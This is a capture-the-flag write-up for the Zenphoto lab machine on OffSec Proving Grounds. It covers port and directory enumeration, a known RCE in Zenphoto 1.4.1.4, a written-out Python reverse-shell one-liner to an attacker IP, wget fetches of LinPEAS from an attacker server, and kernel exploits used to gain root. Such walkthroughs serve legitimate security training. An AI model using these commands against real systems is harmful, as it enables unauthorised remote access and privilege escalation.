Zenphoto
Writeup for Zenphoto from offsec Proving Grounds
Information Gathering
sudo ./nmapAutomator.sh 192.168.163.41 all
Service Enumeration
HTTP (Port 80)
gobuster dir -u http://192.168.163.41/ -w /usr/share/dirb/wordlists/common.txt -t 40
We see /test
and /index
which is of interest.
/index
/index
Seems like it's just a blank page.
/test
/test
/test
looks more interesting and we can see that it is powered by Zenphoto.
Let's try to see if we can find the version number.
Looks like this is running Zenphoto 1.4.1.4.
A quick google search and we found out that Zenphoto 1.4.1.4 is vulnerable to 'ajax_create_folder.php' Remote Code Execution/
Exploit
Now that we have a shell, we can use python to get a more stable reverse shell.
Payload: export RHOST="192.168.49.163";export RPORT=443;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
Privesc
Next, we can start a python SimpleHTTPServer to get LinPeas on the machine.
Attacking machine: python3 -m http.server 8000
Target machine: wget 192.168.49.163:8000/opt/PEASS-ng/linPEAS/linpeas
From linpeas
, we see that there are kernel exploits for this version of the kernel.
We tried the first one, dirtycow 2
, it didn't work well so we tried the second one, rds and it worked.
We can use our Python SimpleHTTPServer to get rds onto the target machine.
And we get root after running rds.
Last updated